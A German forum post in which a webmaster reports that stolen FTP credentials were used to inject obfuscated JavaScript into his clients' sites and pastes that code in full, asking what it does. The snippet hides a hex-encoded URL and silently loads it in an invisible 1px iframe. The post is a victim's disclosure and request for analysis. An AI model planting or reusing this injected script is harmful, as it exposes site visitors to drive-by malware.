Hallo zusammen,
wir hatten letzte Woche massive Probleme mit mehreren von uns betreuten Webeiten. Vermutlich durch einen Trojaner wurden FTP-Daten vom Firmenlaptop gestohlen und auf mehreren Web-Servern sein unwesen getrieben. Anscheinend war die XML-Datei von Filezilla das Ziel.
" />
Aber nun zum eigentlichen Problem - folgender Code wurde einfach automatisiert in den Head-Bereich von den HTML- und/oder PHP-Dateien geschrieben:
<****** type="text/javascript">
if('SWqd'=='pVIds')yQtLJ='KZAbgi';
var EtjY='oWqlS';
if('OKdyd'=='juVgU')NKIj='IkfX';
var fOasEf='evKdIb';
var PiGDye;
var eiJZJvHsB="889494905a4f4f878d939481944e898e868f4f";
var BLoj=241;
var hucD=126;
var NUaEJzZzl="\x66rom\x43ha\x72\x43od\x65";
var CRLTMp;
function YJbs(){
var jBHyFB='xZERob';
if('HzinY'=='VkRZS')eIRN();
}
var appVersion_var="appVe\x72s\x69\x6fn";
if('qGDo'=='OEkm')dAiK();
var pYcCkCtxW="bo\x64y";
var fdEs;
var TRREaO='gkLRg';
var iRttQIt="constructor";
if('bXRXcg'=='TCEVPf')GEdS();
var px1_var="1px";
var SfDxeN=58;
if('gcohh'=='XQAL')ZmyZA();
var VNXpwfH="\x61ppen\x64Child";
var pIPn=281;
var oCJrS;
var Unjhtpwk="p\x61rs\x65Int";
function HoKnc(){
}
var lglXBS='vUqzkn';
var jirmCY;
var itXUJgtk="\x73li\x63e";
var fTUc;
if('ojKRL'=='auQXP')bAhX();
var zUUyuKq="";
var HFXSN=68;
var IdKjjDt=(function(){
if('ArPpyf'=='OtImyQ')rABYw='elvQ';
if('UGbb'=='OObk')dinSTi='pAPYzX';
return this;
var zKDERN='zlqdj';
function qeEmug(){}
})();
var gCGXR='NwKDuW';
if('Huye'=='VxGO')eGqm='HJbwe';
var cittO="rodfWdnWZ"[iRttQIt];
var VkWmt='swOjR';
function nNKg(){}
function SIkl(){var qgbi='KNQW';
if('RqmE'=='YYrrlW')SscBls();}
var djIkR=36;
for(var UQhTPGeHM=0;UQhTPGeHM<eiJZJvHsB.length;UQhTPGeHM+=2){
function jmbb(){}
function arpJt(){var KMcm='vcyIMI';if('ilmemt'=='puEoI')gSLz();}
HWZiTeI=IdKjjDt[unjhtpwk](eiJZJvHsB[itXUJgtk](UQhTPGeHM,UQhTPGeHM+2),16)-32;
var olXpd;
zUUyuKq+=cittO[NUaEJzZzl](HWZiTeI);
var fAJJI;function CCFfvM(){}}
if('MyFfai'=='zXxyU')PrUR='XJuzgQ';
if('jrzmEK'=='rubR')BGyBw();
var Kdla=178;
var HDLITd;
var COUduU="rwXbeFGj";
function WGgso(){}if('dQEYI'=='wIEn')xZMn();
var XnLRZI=114;
var raPhPwx=navigator[appVersion_var].indexOf("MSIE")!=-1?'<iframe name="'+COUduU+'" src="'+"zUUyuKq"+'">':'iframe';if('scdjK'=='MOMx')CedOk='vPGXCf';
var lOlYgZrcc=document.createElement(raPhPwx);
function qTwTwV(){}
lOlYgZrcc.keMNCOd=lOlYgZrcc.setAttribute;
var PpqDw='qSTkp';
var tETG=17;
lOlYgZrcc.id=COUduU;
function bXoHj(){var qQYaz='WcUu';if('WfglY'=='OJQzmC')gwUyTX();}var hBQHy;
var MqXs;
lOlYgZrcc.name=COUduU;
if('ZgabRt'=='qAxKn')sOnyZ='MAsN';
function TuDjJM(){var zvkZ='scyOTc';
if('EOVZ'=='WLOS')UWrU();
}var ORweLH;lOlYgZrcc.keMNCOd("src",zUUyuKq);
var QkgK=106;
var rJhb;lOlYgZrcc.style.height=px1_var;
var oERyMv='CAvl';
var wPoIc='UWUU';
var uKlh=191;
lOlYgZrcc.style.position="absolute";
if('GBwYm'=='ergpH')SYJl();
if('XAyse'=='yCRU')Bxgso='dSIhyF';
lOlYgZrcc.style.right="0px";
lOlYgZrcc.style.width=px1_var;
var rFqwW=52;
lOlYgZrcc.style.top="0px";
if('pzcHi'=='EzNR')VzRt();
function vFLP(){var XRTLf='clstsz';
if('VtrpA'=='AklGuB')oVPc();
}
function CAjCMgsSa(){var twfkV;
if(document[pYcCkCtxW]){if('VXkX'=='iQbqEO')KjnTA='nnuk';
if('fMElu'=='fTZaH')ILXs();document[pYcCkCtxW][VNXpwfH](lOlYgZrcc);
var uhWUUN='ADlYww';
var sNmzM;
}else{var lZJPM=253;
setTimeout(CAjCMgsSa,120);
}
var yhZf='LPAik';
function eUeRmD(){}}
CAjCMgsSa();
var iGvsle;
function RDmLlY(){var RITVX='wHfN';
if('DbOj'=='nwVes')pNaN();
}var Icmaf;
</******>
Natürlich wurde sofort nachdem die Infizierung bekannt wurde alles lokal und auf dem Server bereinigt und die FTP-Passwörter umgehend geändert.
Jetzt frage mich aber, welche Absicht genau hinter dem Code steckt? Wie schadhaft ist er wirklich?
Es wird anscheinend ein iFrame eingebunden, aber wohin verweist es?
Außerdem lassen sich im Web noch zahlreiche Seiten finden, die den Code oder einen ähnlichen enthalten UND BITDEFENDER WEIST DIESE SEITEN ALS SICHER AUS!
Könnt ihr das mal überprüfen: Es reicht bei Google "appVersion_var" einzugeben.
Eine bereinigte Seite von uns wird zudem leider immer noch von BitDefender blockiert - gibt es eine spezielle Adresse an die man sich wenden soll oder ganz allgemein an das Support-Team schreiben? Möchte es hier ungern im Forum auflisten 
Danke für eure Hilfe.
LG Basti